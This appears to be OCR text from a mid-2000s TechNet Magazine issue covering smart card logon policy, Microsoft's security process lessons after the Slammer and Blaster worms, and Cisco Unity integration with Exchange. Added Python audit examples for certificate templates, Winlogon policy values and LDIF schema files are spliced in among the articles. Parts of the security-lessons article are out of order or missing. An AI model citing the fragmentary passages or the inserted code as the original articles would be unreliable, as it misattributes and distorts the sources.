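        findings.append(f"does not supersede {initial_name}, so autoenrollment never triggers")
    if not any("Autoenroll" in r for g, r in t["acl"].items() if g not in PRIVILEGED):
        findings.append("no smart card holder group holds Autoenroll")
    return findings


# Constructed samples; ORG_OID and the Contoso group names are placeholders.
ORG_OID = "1.2.3.4.5.6.7.8.9"
RENEWAL_OK = {
    "msPKI-RA-Signature": 1,
    "msPKI-RA-Application-Policies": [ORG_OID],
    "msPKI-Certificate-Application-Policy": [OID_SMART_CARD_LOGON, OID_CLIENT_AUTH, ORG_OID],
    "msPKI-Enrollment-Flag": PUBLISH_TO_DS | CHECK_USER_DS_CERT | AUTO_ENROLLMENT,
    "msPKI-Supersede-Templates": ["ContosoSmartCardInitial"],
    "msPKI-Minimal-Key-Size": 1024,
    "acl": {"Contoso Smart Card Holders": {"Read", "Enroll", "Autoenroll"}},
}
INITIAL_BAD = {  # defaults left in place: no signature, weak key, admins keep Enroll
    "msPKI-RA-Signature": 0,
    "msPKI-RA-Application-Policies": [],
    "msPKI-Certificate-Application-Policy": [OID_SMART_CARD_LOGON, OID_CLIENT_AUTH],
    "msPKI-Enrollment-Flag": 0,
    "msPKI-Supersede-Templates": ["SmartcardLogon", "SmartcardUser"],
    "msPKI-Minimal-Key-Size": 512,
    "acl": {"Domain Admins": {"Read", "Enroll"}, "Contoso Enrollment Agents": {"Read", "Enroll"}},
}
```

Each audit function returns an empty list for a template that matches the figure and one finding per deviation, so the output can be fed straight into a change ticket.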


If a workstation is not joined to a domain, Windows NT Lan Manager (NTLM) authentication is used to authenticate the account and password combination required. Since smart cards require Kerberos authentication, they cannot be used in this scenario. If an application uses Basic Authentication or NTLM authentication, smart cards cannot be used for authentication purposes. Only applications using Kerberos that support PKINIT extensions will work with smart cards. 


Defining Smart Card Usage in Your Organization 

Once you have deployed smart cards to the users in your organization, you can fine-tune security settings in Active Directory and other services to define how the smart cards are to increase network security. The settings that you can define include: 

• Requiring smart cards for interactive logon 
• Requiring smart cards for remote access logon 
• Defining smart card removal behavior 
• Using smart cards for the various administrative tasks 

Through group policy, you can define whether smart cards are required for interactive logon by using the Interactive Logon: Smart Card Required Group Policy setting. This setting, defined in Computer Settings | Windows Settings | Security Settings | Local Policies | Security Options, enforces smart card logon for all users on computers where the Group Policy setting is defined. Alternatively, you can enable the "Smart Card Is Required For Interactive Logon" option on the Account tab of the user's object in Active Directory. This method gives you more flexibility in that you can enforce smart cards on a user-by-user basis. 

Do not enable the Smart Card Is Required For Interactive Logon and the User Must Change Password At Next Logon options for a user account. When you enable the Smart Card Is Required For Interactive Logon option in a Windows Server 2003 environment, the operating system takes over user password management. The operating system assigns a maximum-length password that is equivalent to 255 characters and ensures that the password meets complexity requirements, effectively blocking the user from logging onto the network by using a password. 

When you enforce smart card logon in your domain, you must also ensure the validity and availability of the CRL Distribution Point (CDP) and Authority Information Access (AIA) URLs in the smart card certificates as well as all CA certificates in the certification chain. The domain controller accepting the smart card authentication attempt will perform a revocation check on the smart card certificate during the logon process. 

To enforce smart card authentication for remote access, you must configure a remote access policy at a remote access server or a RADIUS server to require Extensible Authentication Protocol with Transport Layer Security (EAP/TLS) authentication in the profile settings. 

When you enforce EAP/TLS authentication, you can elect to restrict client certificates to a smart card or other certificate. The only additional configuration required 




at the Routing and Remote Access (RRAS) server or the Internet Authentication Services (IAS) server is to designate the Server Authentication certificate used by the server for mutual authentication. 


Group Policy also allows you to define the action that takes place when users remove their smart cards from a smart card reader by using the Interactive Logon: Smart Card Removal Behavior Group Policy setting. This setting, defined in Computer Settings | Windows Settings | Security Settings | Local Policies | Security Options, ensures that smart card removal behavior is consistent for all computer accounts in the OU or domain where the Group Policy is applied. 

In this Group Policy setting, you can define the removal behavior one of three ways: 

No Action The default setting. The removal of the smart card does not lock the workstation or log off the current user. 

Lock Workstation The removal of the smart card causes the workstation to lock. The user must press Log On Interactively or provide the PIN for the smart card to unlock the workstation. 

Force Logoff The user currently logged on is automatically logged off. 
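An added example, not code from the article: the Python below reads the two Winlogon policy values that the Smart Card Required and Smart Card Removal Behavior settings write, from constructed `reg query` output, and flags user accounts where Smart Card Is Required For Interactive Logon and User Must Change Password At Next Logon are both set (the conflict described earlier in this section). The sample data is constructed; the registry value names and the userAccountControl bit are Windows values, not taken from the article.

```python
"""Check the smart card logon settings this section describes.

Added example, not code from the article.  REG_QUERY_OUTPUT is constructed
text in the shape of `reg query` output for the two Winlogon policy values
behind the Smart Card Required and Smart Card Removal Behavior settings, and
USERS is a constructed sample of userAccountControl / pwdLastSet attributes as
read from Active Directory.  Registry paths and the userAccountControl bit are
Windows values, not taken from the article.
"""
import re

# userAccountControl bit set by "Smart Card Is Required For Interactive Logon".
SMARTCARD_REQUIRED = 0x40000

# Values written by the two Group Policy settings the article names.
SC_FORCE_OPTION = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption"
SC_REMOVE_OPTION = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\scremoveoption"
REMOVAL_BEHAVIOR = {"0": "No Action", "1": "Lock Workstation", "2": "Force Logoff"}

REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    scforceoption    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    scremoveoption    REG_SZ    1
"""

# Constructed accounts: (sAMAccountName, userAccountControl, pwdLastSet).
# pwdLastSet == 0 is how "User Must Change Password At Next Logon" is stored.
USERS = [
    ("jdoe", 0x200 | SMARTCARD_REQUIRED, 0),                   # conflicting combination
    ("asmith", 0x200 | SMARTCARD_REQUIRED, 132000000000000000),
    ("svc-backup", 0x200, 132000000000000000),                 # password logon still allowed
]


def parse_reg_query(text):
    """Turn `reg query` style output into {value_path: data}; DWORDs become ints."""
    values, key = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = re.match(r"\s+(\S+)\s+(REG_\w+)\s+(\S.*)$", line)
        if m and key:
            name, typ, data = m.groups()
            values[key + "\\" + name] = int(data, 16) if typ == "REG_DWORD" else data.strip()
    return values


def audit_computer(values):
    """What the machine policy enforces for every user who logs on there."""
    return {
        "smart_card_required": values.get(SC_FORCE_OPTION, 0) == 1,
        "removal_behavior": REMOVAL_BEHAVIOR.get(str(values.get(SC_REMOVE_OPTION, "0")), "unknown"),
    }


def audit_users(users):
    """Per-user enforcement, plus the conflict the article warns about."""
    report = {}
    for sam, uac, pwd_last_set in users:
        required = bool(uac & SMARTCARD_REQUIRED)
        issues = []
        if required and pwd_last_set == 0:
            issues.append("smart card required together with must-change-password: "
                          "the user cannot log on")
        report[sam] = {"smart_card_required": required, "issues": issues}
    return report
```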

In a pure Windows 2000 network, it was 
not possible to use smart cards for all ad- 
ministrative tasks. Several tasks still re- 
quired the input of user credentials and 
passwords, reducing the security gains ac- 
complished through the issuance and us- 
age of smart cards. Windows XP and 


Windows Server 2003 offer enhancements that enable additional usage of smart cards in administrative activities, including the RunAs, Net Use, and DCPromo commands, and Terminal Services. 

The RunAs command allows you to run a program in a security context other than that of the currently logged on user. For 


example, if administrators have day-to-day accounts and smart cards for administrative tasks, they can use the RunAs command to run administrative tasks with their smart cards, whether accessed via the GUI or from the command line. From the command line, you can add the /smartcard switch; from the GUI, you can elect to use a smart card for authentication. 

Like the RunAs command, you can choose to use a smart card to provide credentials for network drive mapping. From the command line, you must use the /smartcard switch to designate that the credentials are read from a smart card. Likewise, from the GUI, you can choose to connect with a different user name and then select the smart card from the list of available credentials. 

If the computer you are promoting to a domain controller is already a member of the forest, you can use a smart card to validate your identity in the DCPromo wizard. The computer must be a member of the forest before running DCPromo; otherwise the option is not available. This option is only available on computers running Windows Server 2003. 

A user can use her smart card to connect to the Remote Desktop Service (or Terminal Services) running on Windows XP or Windows Server 2003, as long as the host computer is a member of an Active Directory domain. The Windows XP and Windows Server 2003 Remote Desktop client accepts smart cards as a form of authentication and passes the credentials to the remote computer. 

If you are using a third-party CSP, it must be loaded at both the remote client and the remote desktop server so that the smart card is recognized at each end of the Terminal Services connection. 


Conclusion 

A successful smart card deployment is dependent on proper planning and design. By putting the effort up front during the design process, making sure that you review all aspects discussed in this article, you will ensure a successful smart card deployment for your organization. 



Five Lessons From The Microsoft Security Center Of Excellence 

Aaron Turner 

AT A GLANCE 
• Responding to automated self-propagating worms 
• Improving system design and maintenance for better security 
• Measuring and enforcing 

Aaron Turner is the Microsoft Security Center of Excellence Delivery Manager, and works with Microsoft Services to coordinate security consulting activities around the world. He has worked with customers of all sizes to develop effective IT security programs. 

The Microsoft Security Center of Excellence (SCOE) assists Microsoft enterprise customers in establishing secure network environments by providing accurate and implementable guidance and tactical expertise for real-world security challenges. The SCOE collaborates with customers, partners, industry, and other teams at Microsoft to increase awareness, foster innovation, and expand its reach of support on security topics. 

Since the Slammer and Blaster worms hit in 2003, members of the SCOE have worked with many Microsoft corporate customers, dealing with difficult security problems. To put the problems in perspective, it's important to understand how Microsoft and our customers arrived in the situation that we found ourselves in last year. 


A Little History 

Five years ago, there was a strong push by our enterprise customers to achieve the highest levels of availability possible on Windows-based systems. This effort, combined with the improvements in Windows 2000, resulted in a major shift toward actual availability targets. To support these targets, IT departments created Service Level Agreements (SLAs) for their Windows-based systems and worked diligently to document the level of availability that users could expect from their servers and workstations that run Windows. As Windows 2000 technology matured, along with the continual drive for efficiency in enterprise IT operations, Windows operating systems became mission-critical for many Microsoft customers. 

For Microsoft customers SLAs were also the catalyst that let them see IT as a cost that could be outsourced. This resulted in many companies investigating alternative options to drive efficiency. The mission-critical nature of Windows operating systems, combined with the increased expectation for availability and the push toward outsourcing, created an odd situation where the secure design, deployment, and maintenance of Windows systems were often an afterthought. Even then security was often viewed as an impediment, especially by those in the eBusiness space. 

In July 2001, the Code Red virus was un- 
leashed, followed by Slammer, Blaster, and 
the recent Sasser worms. The advent of au- 
tomated, self-propagating worms that could 
exploit vulnerabilities in unprotected and 
unpatched systems wreaked havoc on many 
business networks. What is most interest- 
ing about these worms is that in every large- 
scale worm scenario, the technology existed 
to prevent the worms from succeeding. The 
worms generally spread due to process fail- 
ures. In every case where customers were 
not impacted by these worms, their resil- 
iency can be attributed to a robust IT secu- 
rity program that focuses on process rather 
than on technology. 

Note that OS vulnerabilities have been 
exploited for a long time, but the wide ac- 
ceptance of Windows as an enterprise plat- 
form and the advent of the Internet caught 
Microsoft in the cross hairs. It also served 
as a wake-up call to anyone working with 
Windows operating systems. Companies 
realized they had sacrificed security for the 
sake of convenient networking. 

For customers at Microsoft, the reper- 
cussions of Code Red spurred many of the 
security-related improvements that were 
seen in Service Pack 3 for Windows 2000, 
Service Pack 1 for Windows XP, and the 
secure-by-default design of Windows 
Server 2003. The consequences of worm- 
related security incidents served as a rally- 
ing point for many security professionals. 
Unfortunately, for those working with Win- 
dows operating systems, it took events on 
the scale of these insidious viruses to call 
attention to the importance of secure sys- 
tem design, deployment, and maintenance. 

Those of us focused on security at Microsoft know that the root cause of Blaster and other worms targeting Microsoft applications is software vulnerabilities. At the same time, we have learned from our own internal Microsoft IT organization, as well as from customers who have dedicated time and talent to exploring the risks posed by security incidents, that software-based vulnerabilities can be mitigated through an effective IT security program. Here are some of the lessons. 


mainframe computing. A simple inventory is a great place to start to determine exactly which systems exist and how they are connected to your network. There are several ways to perform an inventory. They include the use of rudimentary network scanning tools, complex log revision techniques using information in Active Directory, Dynamic Host Configuration Protocol (DHCP), DNS servers, and using dedicated systems management tools. 

It's important to note that in nearly every catastrophic incident that affected our business customers, the problem was not caused by a managed system but was introduced by a system outside of the IT group's control. It is imperative to create a process where you can quickly and effectively verify which systems are under your control, and then identify any unmanaged systems. The identification of these systems generally represents the most difficult task for the IT staff to accomplish, but it is a necessary effort. 

Several Microsoft customers that successfully identified their unmanaged systems relied on a tightly integrated virtual team composed of members from IT operations and the networking group. 

To begin, the IT operations staff requested that the networking team identify all IP addresses in use on the company's networks. The IT team then began subtracting known IP addresses of managed systems from the list. The resulting set of IPs were not accounted for and thus identified the systems that needed to be addressed first. After all systems were identified, they were classified into subgroups to make them more manageable. The first step was separating the managed and the unmanaged. 

Subgroups were defined based on a system's role, its location, or other attributes that couldn't be consolidated to eliminate the unwieldy problem of attempting to secure each individual system. 


Establish Asset Ownership 

The asset owner is either the system [...]or or the support group tasked with system maintenance. In the SCOE's experience, a successful IT asset ownership assignment rarely results in an IT staff member being assigned as the person responsible for system maintenance. Crossing the boundary from IT staff to business group ownership and responsibility for IT systems marks the beginning of a successful ownership assignment program. Based on experience, most IT professionals can easily identify examples where a line-of-business (LOB) application served as a blocker to deploying a critical system update. Shifting the responsibility of securing the IT asset that relies on the system to the business group is an important step in ensuring the success of this process. 

Microsoft, like most large global organizations, found a situation where business owners would resist system updates. At one 

For IT professionals, the central principles of any effective program designed to manage the risk associated with software-based vulnerabilities are: 

1 Identify and classify assets 
2 Establish asset ownership 
3 Define baseline system requirements 
4 Measure compliance 
5 Enforce compliance 

September 2004 


point, there were possibly thousands of our 
internal systems that could not be properly 
secured or maintained because of the re- 
luctance to stop services long enough to 
change security settings or perform system 
updates. Over time, these exceptions were 
reduced to hundreds, and eventually re- 
duced to tens. Currently a business-group 
exception for a system must be escalated to 
the highest levels of a business unit in order 
to be approved. 

Creating a Responsible, Accountable, 
Consulted, Informed (RACI) matrix for as- 
sets is another great exercise in assuring that 
assets are properly accounted for and key 
stakeholders identified. Integrating this in- 
formation into a Configuration Manage- 
ment Database (CMDB) results in a very 
powerful data set that can help IT staff and 
business leaders make informed decisions 
about when to force the issue of updating a 
particular system or establishing improved 
system maintenance processes for line of 
business applications. 


cies, but relatively few confirm that those 
policies are applied uniformly on produc- 
tion systems. The alignment between secu- 
rity policies, system build standards, and 
actual implementation is extremely impor- 
tant. The key requirements that need to be 
identified can be information such as re- 
quired settings, required software and ser- 
vices, and required updates. There must also 
be key prohibitions that outline what is not 
an acceptable configuration. 

As with asset ownership, accountability 
and responsibility for the baseline system 
requirements should lie with the business 
group that relies on the IT system. If excep- 
tions are sought, each business group 
should follow a process to ensure that the 
appropriate risk is analyzed and commu- 
nicated to all participants and business 
leaders before they are granted. 

76 TechNet Magazine

However, this should not be interpreted to mean that the only solution is the default
model for system builds. Within Microsoft, 
we have standardized builds that employ- 
ees may use for their workstations, but any- 
one can install other platforms or versions 
of software. The onus is then placed on the 
user to assure that the system meets estab- 
lished baseline requirements for configu- 
ration settings, required software (such as 
antivirus protection), and that required up- 
dates are installed. Flexibility is possible, but 
should only be allowed within a carefully 
monitored and maintained environment. 


of managed-system configuration status, 
the identification of unmanaged systems, 
and the mapping of each system to an ap- 
propriate business owner who is ultimately 
responsible for the system’s adherence to 
the established system baseline. As with any 
complex process, measuring compliance 
requires periodic audits with formal targets 
to monitor the effectiveness of the program. 
The reports should officially serve as an indication of a company's IT health in addition to a warning light, helping those responsible for IT systems make informed decisions about systems at greatest risk, and which baseline settings are inconsistent with the baseline system configuration.


business-critical system would have been considered heretical. When businesses focused more on availability than robustness, shutting down an LOB server to electively bolster security would result in a lot of flak. Heaven forbid if a CEO's laptop temporarily lost connectivity due to maintenance, and he could not read e-mail.

The SCOE handled just such a case recently with a customer. In a follow-up meeting with the customer's IT staff, there were tense moments when the customer's CEO expressed his frustration about being unable to connect to the intranet while technicians worked on resolving the problem. However, after reading the news headlines the next day about the impact of the same virus on several of his company's competitors, he appreciated that his business had been protected by the procedures that he had cursed the day before.

In nearly every catastrophic incident, the problem was not caused by a managed system but was introduced by a system outside of the IT group's control.

The benefits of enforcing security poli- 
cies and assuring adherence to baseline 
standards may not always be apparent, but 
with relatively few exceptions, new security 
processes have improved IT departments 
and changed how they are perceived and 
used within large organizations. 


Securing Your Environment 

A myriad of technologies exist to help 
you protect your environments, but with- 
out a robust procedure to ensure the integ- 
rity of systems connected to your networks, 
none will be effective. 

Working toward the establishment of a 
well-managed IT environment takes disci- 
pline and consistency. The Security Center 
of Excellence is committed to sharing with 
all of our customers the lessons that we learn 
from our own experiences, as well as the 
best practices that we prove within our in- 
ternal IT environments. For more informa- 
tion on security for Microsoft systems, talk 
with your Microsoft relationship manager 
or visit the Microsoft security Web pages at 
www.microsoft.com/security. @ 




Integration

Voice Mail In Your Inbox: Cisco Unity And Microsoft Exchange Make it Happen

Jeff Centimano

AT A GLANCE
• Setting up Cisco Unity voice mail features
• Integrating Unity with Microsoft Exchange
• Planning an integrated voice mail deployment

Jeff Centimano is a Principal Consultant for Levi, Ray & Shoup, Inc. LRS is a Microsoft Gold Partner and a Cisco Silver Partner. Jeff has been an IT consultant for 10 years and specializes in Microsoft directory and messaging technologies.

We've been hearing about voice/data convergence for several years now. Many organizations have taken the leap to reduce long-distance phone charges between offices, most often in the form of voice over Frame Relay (or similar transport). However, up-front costs, long private branch exchange (PBX) leases, and general resistance from those more comfortable with traditional voice services have slowed desktop IP telephony deployments. As compelling as a fully converged network may be, most businesses are not yet ready to commit.

One converged technology that should not be overlooked is unified messaging. This can take several forms, but is most often thought of by its end result: voice mail and fax messages in a user's e-mail Inbox. An organization need not deploy a full IP telephony infrastructure to take advantage of unified messaging.

Introducing Unified Messaging and Cisco Unity

Simply put, unified messaging is the storage of multiple forms of communication in one central location. From this central location, messages can be retrieved and manipulated in nontraditional ways. For example, think about checking your e-mail and finding a voice message from an important client. Imagine being on the road and having your e-mail messages read to you in order of urgency. Consider retrieving a fax message by redirecting it to a fax machine at your hotel business center. All of these scenarios and more are possible with a unified messaging system.

One of the premier unified messaging products is Cisco Unity. Cisco acquired Unity from Active Voice in 2000 in order to add a voice mail solution to Cisco's suite of IP communication products. Since that acquisition, Unity has seen a series of upgrades and improvements. Currently at version 4.0, Cisco Unity excels in delivering advanced voice messaging services and can interface with Microsoft Exchange versions 5.5, 2000, and 2003, as well as with Lotus Domino.

Even though Unity is tightly integrated 
with other Cisco IP telephony products, it 
does not have a dependency on IP tele- 
phony and can be deployed in traditional 
PBX environments. An administrator sim- 
ply needs to install one or more Intel Dia- 
logic voice cards in the Unity server to allow 


it to communicate with the existing PBX. 
Cisco's Web site, www.cisco.com, provides step- 
by-step guides for integrating Unity with 
various vendor systems. 

Unity comes in two flavors: Unity Voice 
Mail and Unity Unified Messaging. Since 
Unity Voice Mail is a standalone product 
that does not integrate with other e-mail 
systems, I will not cover it here. 


Cisco Unity and Microsoft 
Integration Points 

Cisco Unity requires several important 
Microsoft technologies in order to func- 
tion. At first glance, the implementation of 
Unity may appear daunting. For starters, 
the product extends Active Directory’ with 
custom schema extensions, binds itself to 
a Global Catalog server, and requires ro- 
bust name resolution services. These re- 
quirements alone should indicate the 
importance of thorough planning. 

Unity needs to extend three Active Di- 
rectory schema classes (User, Group, and 
Contact) and create a new class of its own— 
the Unity Location class. The Unity instal- 
lation CD contains an application called 
ADSchemaSetup that imports the necessary .ldf files into Active Directory.

Cisco provides excellent documentation 
on the exact number of schema extensions 
as well as on the potential impact on your 
Active Directory database size. For example, 
Cisco records and stores each user's spoken 
name in Active Directory. Depending on 
the codec you choose for audio compres- 
sion, this could be 20KB per user. (See the 
“Codecs” sidebar for further information.) 


www.technetmagazine.com 


Cisco recommends that you plan for a 
10-15 percent increase in the size of your 
Active Directory database after implement- 
ing Unity. If you are one of those people 
who enjoy running ADSIEDIT every now 
and then, you will appreciate Cisco's nam- 
ing standard: all attributes start with “cisco”. 
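Because a schema extension is permanent and forest-wide, it is worth reading the .ldf files before ADSchemaSetup imports them. The following is an added example, not part of the article and not Cisco's tool: a small Python reviewer that lists the attributes and classes an LDIF file would add or modify, and flags any attribute that does not follow the "cisco" naming standard or any modification of a class other than User, Group, and Contact. The LDIF text, attribute names, and OIDs below are constructed placeholders, not Cisco's real schema.

```python
import re
from dataclasses import dataclass, field

# Classes the article says Unity extends, and the vendor's attribute prefix.
EXPECTED_CLASSES = {"user", "group", "contact"}
NAME_PREFIX = "cisco"

# Constructed sample .ldf content: two new attributes (one mis-named),
# a modification of the User class, and a modification of an unexpected class.
SAMPLE_LDF = """\
dn: CN=ciscoEcsbuSample,CN=Schema,CN=Configuration,DC=X
changetype: add
objectClass: attributeSchema
attributeID: 1.3.6.1.4.1.9999.1.1
lDAPDisplayName: ciscoEcsbuSample

dn: CN=unityBadName,CN=Schema,CN=Configuration,DC=X
changetype: add
objectClass: attributeSchema
attributeID: 1.3.6.1.4.1.9999.1.2
lDAPDisplayName: unityBadName

dn: CN=User,CN=Schema,CN=Configuration,DC=X
changetype: modify
add: mayContain
mayContain: ciscoEcsbuSample
-

dn: CN=Computer,CN=Schema,CN=Configuration,DC=X
changetype: modify
add: mayContain
mayContain: unityBadName
-
"""


@dataclass
class LdifEntry:
    dn: str
    changetype: str
    attrs: dict = field(default_factory=dict)   # lower-cased attribute -> values


def parse_ldif(text):
    """Minimal LDIF parser: records are separated by blank lines, each line is
    'attr: value', a leading space folds a line onto the previous one, and a
    bare '-' separates modify operations."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = []
        for raw in block.splitlines():
            if raw.startswith(" ") and lines:
                lines[-1] += raw[1:]            # folded continuation line
            elif raw.strip() != "-":
                lines.append(raw)
        entry = LdifEntry(dn="", changetype="add")
        for line in lines:
            key, _, value = line.partition(":")
            key, value = key.strip().lower(), value.strip()
            if key == "dn":
                entry.dn = value
            elif key == "changetype":
                entry.changetype = value.lower()
            else:
                entry.attrs.setdefault(key, []).append(value)
        entries.append(entry)
    return entries


def review_schema_ldif(text, prefix=NAME_PREFIX, expected_classes=EXPECTED_CLASSES):
    """Return (new_attribute_names, modified_class_names, findings)."""
    new_attrs, modified, findings = [], [], []
    for entry in parse_ldif(text):
        cn = entry.dn.split(",")[0].split("=", 1)[1]
        classes = [v.lower() for v in entry.attrs.get("objectclass", [])]
        if entry.changetype == "add" and "attributeschema" in classes:
            name = entry.attrs.get("ldapdisplayname", [cn])[0]
            new_attrs.append(name)
            if not name.lower().startswith(prefix):
                findings.append(f"attribute {name} does not start with '{prefix}'")
        elif entry.changetype == "modify":
            modified.append(cn)
            if cn.lower() not in expected_classes:
                findings.append(f"modifies unexpected class {cn}")
    return new_attrs, modified, findings
```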


Keep in mind that the Cisco schema extensions should only be run after Active Directory has been updated for Exchange 2000 or 2003 (forestprep). For more information about making this process as seamless as possible, see "15 Tips For A Smooth Migration to Exchange Server 2003" in this issue of TechNet Magazine.

Unity also needs a well-configured Ac- 
tive Directory replication topology for reli- 
able operation. Unity uses Active Directory 
much like Exchange does, and that means 
that the Global Catalog server is of utmost 
importance. Unlike Exchange, which can tolerate the loss of a "favorite" Global Catalog or directory server, Unity must be manually reconfigured in such a situation. This is a relatively minor point if you know about it ahead of time, but it could cost you hours of troubleshooting otherwise.


Data Storage 


While we are on the subject of Active Directory, it is important to note that while Unity requires Active Directory for numerous operations, it does not query the Active Directory database as often as you might think. Unity instead stores most of the information about subscriber mailboxes and system configuration in its own SQL database. This is stored locally on the Unity server, and only relevant portions are synchronized with Active Directory using a Cisco-supplied replication agent.

Cisco decided upon this strategy for multiple reasons, the most important being the fault-tolerant nature of maintaining a local database. Imagine a scenario where your Exchange or Active Directory servers are down for maintenance. While you might be able to warn internal users about an impending outage, there is nothing to stop an outside caller from leaving a message for a company employee. In this situation, the Unity server has enough information about the employee's mailbox to accept the message and store it until the Exchange or Active Directory servers are back online.

Winter 2005

Figure 1 The ViewMail Playback Control

The flavor of SQL used by Unity is primarily dependent on the number of voice ports deployed. If your Unity server has 32 or fewer voice ports, then Unity will configure a local MSDE 2000 database. If it has more than 32 ports or a failover configuration is required, Unity will install a local copy of SQL Server 2000. This installation on the Unity server is only intended to support Unity; any other usage violates the terms of the Unity license agreement.

Another integration point is Unity's use of DNS and WINS. To communicate with your Exchange and Active Directory servers, the Unity server must be pointed to the dynamic DNS servers that support your Active Directory environment. Unity can then query for service records (SRV) of relevant directory servers in the enterprise. WINS is required for environments still running Windows NT domains, although it is also highly recommended for Active Directory environments.

Unity puts a real-time load on an Exchange infrastructure, so the performance of your Exchange infrastructure is something else to consider even before adding Unity to the mix. Unlike e-mail where delays are often acceptable, a big delay (such as silence) when a user calls in to receive their voicemail can give a user the impression that the messaging system is broken. Thus, you should run the Exchange performance tools to see how the system is responding. If you see log stalls, poor disk performance, or high CPU usage, you may want to upgrade the servers, add memory, or look at alternative storage options.

This evaluation process should be performed on each Exchange server, depending on the mail policies in place, as the performance from server to server may vary quite a bit. Mail policies, or the lack thereof, can have a big effect on the performance of Exchange servers. Given the way that Unity indexes messages in a user's Inbox, a large Inbox can be problematic. Without mail policies in place, Exchange performance may not be deterministic.

You should also keep in mind that Cisco typically sells to the voice and telecom IT pros. As Exchange is usually managed by the server and application IT pros, you can run into a train wreck if these departments don't talk. Make sure they do.


Outlook and Voice Mail Integration

The final integration point I will discuss in this article is the client-side component known as Unity ViewMail for Outlook (VMO). ViewMail is used to present a voice mail playback applet inside e-mails that contain a voice message. The ViewMail playback control panel is shown in Figure 1.


Using the playback controls, a user can play, pause, increase or decrease volume, and adjust the speed of a message. The ability to speed up or slow down a voice message with the click of a mouse is a powerful feature and one that I use frequently, especially for long messages or a message that I need to hear more slowly. Even at the maximum compression settings, the voice quality remains amazingly good.

While Outlook can play voice messages without using ViewMail, the experience is much less robust. A user who checks her e-mail from a version of Outlook without ViewMail must click on the attached WAV file and listen to it played back in the system default media player. This method works just fine, but does not offer the rich functionality of ViewMail. Also, when you use the ViewMail controls to play a voice message, the data is streamed over the network instead of the "download and play" experience of a WAV file.

ViewMail comes packaged as a Microsoft 
Installer file that lends itself to deploy- 
ment via Active Directory Group Policy or 
Systems Management Server (SMS). Alter- 
natively, this small application can be pack- 
aged and deployed simultaneously with a 
new install of Office 2003 using the Office 
2003 Resource Kit. Regardless of how you 
deploy ViewMail, it will surely become a 
welcome addition to Outlook. 


Unity Deployment: Real 
World Experience 

My company deployed Cisco Unity ear- 
lier this year as part of a full desktop IP 
telephony upgrade. Having been involved 
in the deployment, and now living with the 
technology on a daily basis, I feel qualified 
to offer some useful suggestions for your 
Unity implementation. 

The planning phase is arguably the most 
important in any project, Unity included. 
As in carpentry, a good rule of thumb is to 
measure twice, cut once. 

Depending on the size of your organization, Unity may bring together teams that otherwise might not work together: the Telco team, the Active Directory team, and the Exchange team. Cisco publishes an excellent "Unity Design Guide" that covers topics such as how Unity works, PBX integration, Windows domain considerations, and even how to construct an RS-232 cable (needed to interface with many PBXs). I recommend making this document the foundation of your implementation and ensuring that all team members have a thorough understanding of its contents.
Another priority project component is training. The IT staff will need training on how to administer the new system, although it is surprisingly intuitive for first-time users. I would also suggest a round of training with the user community.

Unity offers an amazing array of features 
that may be overlooked if users are not 
trained on how to use the new system. It is 
particularly important to train users on the 
Cisco Personal Communications Assistant 
Web console, whose main screen is shown 
in Figure 2. 

From this console, users can access a wide array of features that would otherwise require navigating a complex set of phone menus. Educating users on this interface will enable them to take advantage of advanced unified messaging features while also reducing unnecessary help desk calls.

One of my favorite Unity features is text-to-speech (TTS). This feature allows me to call my office remotely and listen to my e-mail messages, which saves both time and money trying to find wireless hotspots to synchronize e-mail.

One unintended consequence of TTS is the comic relief it provides when it reads some of those obnoxious spam messages (you know the ones I am referring to). While this may be funny to most people, it may offend a few, which is one more reason to step up your anti-spam efforts. If you have not done so already, I would recommend investigating the Microsoft Intelligent Message Filter for Exchange Server 2003. This product is available at no charge to organizations running Exchange Server 2003, and does an excellent job of blocking nearly all unwanted spam messages with very few false-positives.

Another Unity feature that complements TTS is the ability to reply with a voice message to an e-mail. I commonly reply over the phone to e-mail messages read to me by the Unity TTS feature. This capability extends to non-Unity users as well, with the recipient receiving the voice message as a WAV file attachment.

Figure 2 Cisco Unity Personal Communications Assistant

One missing link in this feature is the ability to insert a brief statement into a reply message to alert the recipient that the actual message is contained in the attached WAV file. The current version of Unity simply delivers the original message as is, with the only addition being a WAV file attachment. Users not expecting this type of reply may be confused and delete the message, thinking it was left in error. I hope that Cisco will address this shortcoming in a future release of Unity. Until that time, include this tidbit in your user training to head off potential problems.

Finally, a robust Unity backup and restore design is of utmost importance given the value most businesses place on voice messages. Cisco includes a utility called Cisco Unity Disaster Recovery Tool (known as DiRT) that is designed to aid in migrations from one version of Unity to another. While this utility can be used for daily backup and restore activities, Cisco recommends that you invest in additional software for this purpose. To fully protect the Unity server, you will need to acquire software agents to back up both the Windows OS and the SQL Server 2000 database.

If a full server failure occurs, be sure to 
hang on to the network interface card (NIC) 
from the failed server. This is because the 
Unity license is tied to the MAC address on 
the NIC in your original server. If the origi- 
nal NIC is embedded on the system board 
or cannot be moved for some other reason, 
allow time to contact Cisco and have them 
reissue a license key for the replacement 
server. This scenario should be included in 
the Unity recovery section in your Disaster 
Recovery documentation. 


Conclusion 

Being able to check e-mail, voice mail, 
and faxes from anywhere on any device is a 
powerful capability, one which I cannot 
imagine living without. If you would like to 
learn more about deploying Unity within 
your organization, Cisco maintains a wealth 
of marketing and technical information on 
their Web site at www.cisco.com/go/unity. @ 




How Domain Name System Works

Regis Donovan

Without DNS, the Internet would be an ugly place. DNS is one of the services responsible for directing network traffic based on name and numerical IP addresses. Specifically, it's the service that allows users to type in names instead of numbers to locate a Web site or Internet resource. To provide this service, DNS creates a mapping between the numeric IP addresses and the human-readable domain names that Internet users are accustomed to using and can remember more easily.

